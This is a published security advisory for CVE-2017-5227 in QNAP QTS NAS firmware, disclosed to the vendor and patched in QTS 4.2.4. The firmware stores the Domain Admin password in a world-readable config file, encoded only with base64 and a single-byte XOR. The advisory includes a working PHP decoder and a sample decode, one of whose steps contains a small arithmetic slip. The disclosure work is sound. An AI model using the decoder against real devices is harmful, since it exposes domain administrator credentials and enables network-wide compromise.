ush.it - a beautiful place

QNAP QTS Domain Privilege Escalation Vulnerability

March 22, 2017 at 4:49 pm - Filed under Hacks - 1222 words, reading time ~4 minutes - Permalink - Comments

Pasquale "sid" Fiorillo found a critical vulnerability in QNAP QTS allowing the recovery of the Domain Admin password. Such password is "encrypted" with XOR and the key is a single byte! Any web application or extraneous software running in your QNAP system can access such configuration file and jeopardize your entire network if the NAS uses domain authentication for it's users.

QNAP QTS Domain Privilege Escalation Vulnerability

 Name              Sensitive Data Exposure in QNAP QTS
 Systems Affected  QNAP QTS (NAS) all model and all versions < 4.2.4
 Severity          High 7.9/10
 Impact            CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
 Vendor            http://www.qnap.com/
 Advisory          http://www.ush.it/team/ush/hack-qnap/qnap.txt
 Authors           Pasquale "sid" Fiorillo (sid AT ush DOT it) 
                   Guido "go" Oricchio (g.oricchio AT pcego DOT com)
 Date              20170322

I. BACKGROUND

QNAP Systems, founded in 2004, provides network attached storage (NAS)
and network video recorder (NVR) solutions for home and business use to
the global market.
QNAP also delivers a cloud service, called myQNAPcloud, that allows
users to access and manage the devices from anywhere.
QTS is a QNAP devices proprietary firmware based on Linux.

ISGroup (http://www.isgroup.biz/) is an Italian Information Security 
boutique, we found this 0day issue while supporting Guido Oricchio 
of PCego, a System Integrator, to secure a QNAP product for one of his
customer.

Responsible disclosure with Qnap: we contacted qnap on public security@
contact and we escalate fast to their Security Researcher Myron Su on
PGP emails.

Prior vulnerabilities in QNAP: 
https://www.qnap.com/en/support/con_show.php?op=showone&cid=41

Information to customers of the vulnerability is shown in their bulletin
ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
QTS 4.2.4 Build 20170313 includes security fixes for the following
vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
reported by Pasquale Fiorillo of the cyber security company ISGroup
(www.isgroup.biz), a cyber security company, and Guido Oricchio of
PCego (www.pcego.com), a system integrator.

The latest version of the software at the time of writing can be 
obtained from:

https://www.qnap.com/en-us/product_x_down/
https://start.qnap.com/en/index.php
https://www.qnap.com/

II. DESCRIPTION

The vulnerability allows a local QTS admin user, or other low privileged
user, to access configuration file that includes a bad crypted Microsoft
Domain Administrator password if the NAS was joined to a Microsoft 
Active Directory domain.

The affected component is the "uLinux.conf" configuration file, 
created with a world-readable permission used to store a Domain 
Administrator password.

Admin user can access the file using ssh that is enabled by default.
Other users are not allowed to login, so they have to exploit a 
component, such as a web application, to run arbitrary command or 
arbitrary file read.

TLDR: Anyone is able to read uLinux.conf file, world readable by 
default, can escalate to Domain Administrator if a NAS is a domain 
member.

III. ANALYSIS

QNAP QTS stores "uLinux.conf" configuration file in a directory 
accessible by "nobody" and with permission that make them readable by 
"nobody".

If the NAS was joined to an Active Directory, such file contain a Domain
Administrator user and password in an easily decrypt format.

In older versions of QTS the Domain Admin's password was stored in
plaintext.

A) Config file readable by "nobody"

  [~] # ls -l /etc/config/uLinux.conf 
  -rw-r--r--    1 admin    administ      7312 Dec 10 06:39 /etc/config/uLinux.conf

  Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, 
  TS-469L, and TS-221. Access to the needed file are guaranteed to 
  all the local users, such as httpdusr used to running web sites and 
  web application hosted on the NAS.

  This expose all the information contained in the configuration file at
  risk and this is a violation of the principle of least privilege.

  https://en.wikipedia.org/wiki/Principle_of_least_privilege

B) Weak encrypted password in the configuration file

  The Microsoft Active Directory Admin username and password are stored 
  in the file obfuscated by a simple XOR cypher and base64 encoded.

  In this scenario, a Local File Read vulnerability could lead to full
  domain compromise given the fact that an attacker can re-use such
  credentials to authenticate against a Domain Controller with maximum
  privileges.

  The password field in the uLinux.conf has the following format:

  User = <username>
  Password = <base64>

  eg: 
  User = Administrator
  Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==

  The "<base64>" decoded is:

  sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
  00000000  03 03 00 00 01 01 06 06  07 07 04 04 23 23 20 20  |............##  |
  00000010  21 21 26 26 27 27 24 24  43                       |!!&&''$$C|
  00000019

  Each byte xored with \x62 is the hex ascii code of the plaintext char.
  Eg: 
    \x03 ^ \x62 = \x61 (a)
    \x00 ^ \x62 = \x61 (b)
    ...
    \x24 ^ \x62 = \x46 (F)
    \x43 ^ \x62 = \x21 (!)
    
  The plaintext password is: aabbccddeeffAABBCCDDEEFF!

IV. EXPLOIT

The following code can be used to decode the password:

#!/usr/bin/php
<?php
$plaintext = str_split(base64_decode($argv[1]));
foreach($plaintext as $chr) {
	echo chr(ord($chr)^0x62);
}
echo "\n";

Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
aabbccddeeffAABBCCDDEEFF!

V. VENDOR RESPONSE
Vendor released QTS 4.2.4 Build 20170313 that contains the proper
security patch. At the time of this writing an official patch is
currently available.

VI. CVE INFORMATION

Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
Qnap it's referred as Case NAS-201703-21.

VII. DISCLOSURE TIMELINE

20161212 Bug discovered
20170106 Request for CVE to Mitre
20170106 Disclosure to security@qnap.com
20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
20170107 Details disclosure to Myron Su
20170109 Got CVE-CVE-2017-5227 from cve-assign
20170110 Myron Su confirm the vulnerability
20170203 We asks for updates, no release date from vendor
20170215 We extend the disclosure date as 28 Feb will not be met
20170321 QNAP releases the QTS 4.2.4 Build 20170313
20170322 Advisory disclosed to the public

VIII. REFERENCES

[1] Top 10 2013-A6-Sensitive Data Exposure
    https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure

[2] Access Control Cheat Sheet
    https://www.owasp.org/index.php/Access_Control_Cheat_Sheet

[3] https://forum.qnap.com/viewtopic.php?t=68317
    20121213 User reporting that the password was stored in plaintext in
    a world-readable file
    
[4] https://www.qnap.com/en/support/con_show.php?cid=113
    Qnap Security Bullettin NAS-201703-21 

IX. CREDIT

Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the 
discovery of this vulnerability.

Pasquale "sid" Fiorillo
web site: http://www.pasqualefiorillo.it/
mail: sid AT ush DOT it

Guido "go" Oricchio
web site: http://www.pcego.com/
mail: g.oricchio AT pcego DOT com

X. LEGAL NOTICES

Copyright (c) 2017 Pasquale "sid" Fiorillo

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Reed's Alert! Got something burning? Tell USH team.
THP USH Wisec DigitalBullets